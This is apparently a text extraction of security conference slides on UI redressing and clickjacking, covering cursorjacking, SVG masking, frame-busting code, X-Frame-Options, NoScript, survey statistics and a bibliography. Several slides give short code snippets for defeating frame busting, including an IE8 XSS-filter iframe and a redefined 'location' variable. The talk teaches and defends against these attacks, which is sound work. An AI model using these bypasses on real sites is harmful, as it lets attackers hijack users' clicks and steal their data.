  • 21. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Cursorjacking Introduced by Eddy Bordi in 2010 Change the default cursor icon for a new behavior CSS code to change the cursor 1 cursor : url (" pointer2visible . png ") , default ; Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 22. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook SVG masking Truncated SVGMasking.html 1 < svg : rect x ="0.0" y ="0.0" width ="0.373" height ="0.3" fill =" white "/ > 2 < svg : circle cx ="0.45" cy ="0.7" r ="0.075" fill =" white "/ > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 23. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Round up What an attacker can do with UI redressing Stealing cookies Stealing all the files of a folder Stealing files from the intranet or e.g. tokens Sending status messages in your name Showing elements in another context Controlling your addon(s) on mobile devices Many more Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 24. Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking Tool Introduced by Stone at the Black Hat Europe in 2010 Visualize clickjacking techniques in practice Download: http://www.contextis.com/research/tools/ clickjacking-tool/ Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 25. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Counteractive measures Frame busting JavaScript X-Frame-Options NoScript Busting frame busting IE8 XSS filter Disabling JavaScript: Restricted frames Redefining location Clickjacking detection system X-FRAME-OPTIONS Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 26. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook JavaScript Structure of frame busting code conditional statement counter-action Frame busting code 1 if ( top != self ) { 2 top . location . href = self . location . href ; 3 } Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 27. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook JavaScript By Rydstedt et al. - Alexa Top 500 checked Unique sites Conditional statement 38% if (top != self) 22.5% if (top.location != self.location) 13.5% if (top.location != location) 8% if (parent.frames.length > 0) Unique sites Counter-action 7 top.location = self.location 4 top.location.href = document.location.href 3 top.location.href = self.location.href 3 top.location.replace(self.location) Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 28. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-Frame-Options Introduced by Microsoft in 2008 Two possible values DENY: Web page cannot be loaded by a frame SAMEORIGIN: Display the web page in a frame when the origin of the top level-browsing-context is not different PHP implementation 1 <? php 2 header (" X - Frame - Options : DENY ") ; 3 ?> Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 29. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-Frame-Options Firefox: NoScript had experimental X-FRAME-OPTIONS compatibility support in version “1.8.9.9” Browser Lowest version Internet Explorer 8.0 Firefox (Gecko) 3.6.9 (1.9.2.9) Opera 10.50 Safari 4.0 Chrome 4.1.249.1042 Interesting: Content Security Policy (≥Firefox 4) Enables a site to specify which sites may embed a resource frame-ancestors: Valid sources for <frame> and <iframe> Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 30. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook NoScript Extension for mozilla-based web browsers like Firefox Clickjacking protection integrated Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 31. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Busting frame busting In the case that JavaScript protection mechanism are used Busting frame busting Mobile versus non-mobile applications Double framing onBeforeUnload event XSS filter Restricted frames Redefining location Referrer checking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 32. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook IE8 XSS Filter Frame busting code 1 < script type =" text / javascript " > 2 if ( parent . frames . length > 0) { 3 top . location . replace ( document . location ) ; 4 } 5 </ script > IFRAME with IE8 XSS Filter 1 < iframe src =" http :// www . example . org /? abc =%3 Cscript %20 type =%22 text / javascript %22%3 Eif "> 2 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 33. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Redefining location In IE7+ it is possible to redefine “location” By defining “location” as a variable, a reading or navigation by assigning “top.location” will fail, due to a security violation Redefining “location” to deactivate frame busting code 1 < script > 2 var location = " dummy "; 3 </ script > 4 < iframe src =" http :// www . example . org " > 5 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 34. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Clickjacking Defense Published by August Detlefsen, Jason Li, Chris Schmidt, and Brendon Crawford Clickjacking Defense 1 < style id =" aCJ " > body { display : none } </ style > 2 < script type =" text / javascript " > 3 if ( self === top ) { 4 var aCJ = document . getElementByID (" aCJ ") ; 5 aCJ . parentNode . removeChild ( aCJ ) ; 6 } else { 7 top . location = self . location ; 8 } 9 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 35. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Clickjacking detection system Value Rate Visited Pages 1,065,482 100 % Unreachable or Empty 86,799 8.15% Valid Pages 978,683 91.85% With IFRAMEs 368,963 31,70% With FRAMEs 32,296 3.30% Transparent (I)FRAMEs 1,557 0.16% Clickable Elements 143,701,194 146.83 el./page Speed Performance 71 days 15,006 pages/day Total True Positives Borderlines False Positives ClickIDS 137 2 5 130 NoScript 535 2 31 502 Both 6 2 0 4 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 36. Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-FRAME-OPTIONS Alexa Top 100,000 scanned in February 2011 HTTP Header analysis of the first page Value Rate Not scanned 341 0.34% Top 100 3 3.00% Top 1,000 9 0.90% Top 10,000 33 0.33% Top 100,000 143 0.14% DENY 48 33.57% SAMEORIGIN 95 66.43% Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 37. Introduction Attack vectors Counteractive measures Conclusion and outlook Conclusion and outlook UI redressing is a serious attack that can have terrible effects There are protection mechanisms like frame busting to provide a certain degree of client-side security It is possible to disable frame busting code X-Frame-Options and NoScript should be used There will be more attacks concerning UI redressing Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 38. Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Marcus Niemietz, “UI Redressing: Attacks and Countermeasures Revisited”, Jan. 2011, http://ui-redressing.mniemietz.de Jesse Ruderman, “Bug 154957 - iframe content background defaults to transparent”, Jun. 2002, https: //bugzilla.mozilla.org/show_bug.cgi?id=154957 Robert Hansen, Jeremiah Grossman, “Clickjacking”, Dec. 2008, http://www.sectheory.com/clickjacking.htm Paul Stone, “Clickjacking Paper - Black Hat 2010” Apr. 2010, http://www.contextis.co.uk/resources/ white-papers/clickjacking/ Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 39. Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Krzysztof Kotowicz, “Filejacking: How to make a file server from your browser (with HTML5 of course)”, May 2011, http://blog.kotowicz.net/2011/04/ how-to-make-file-server-from-your.html Mario Heiderich, “Opera whole-page click hijacking via CSS”, May 2011, http://html5sec.org/#27 G. Rydstedt, E. Bursztein, D. Boneh, and C. Jackson, “Busting frame busting: a study of clickjacking vulnerabilities at popular sites” in IEEE Oakland Web 2.0 Security and Privacy, 2010, http://seclab.stanford.edu/websec/framebusting/ Giorgio Maone, “NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience”, Apr. 2011, http://noscript.net Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 40. Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Brandon Sterne, “Content Security Policy”, Apr. 2011, http://people.mozilla.com/~bsterne/ content-security-policy/ Mozilla Developer Network, “The X-Frame-Options response header”, Apr. 2011, https://developer.mozilla.org/en/ The_X-FRAME-OPTIONS_response_header Marco Balduzzi, Manuel Egele, Engin Kirda, Davide Balzarotti, Christopher Kruegel, “A Solution for the Automated Detection of Clickjacking Attacks”, Apr. 2010, http: //www.iseclab.org/papers/asiaccs122-balduzzi.pdf August Detlefsen, Jason Li, Chris Schmidt, Brendon Crawford, “Clickjacking Defense”, May 2011, https://www.codemagi.com/blog/post/194 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
  • 41. Introduction Attack vectors Counteractive measures Conclusion and outlook End Thank you for your attention. Any questions? Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking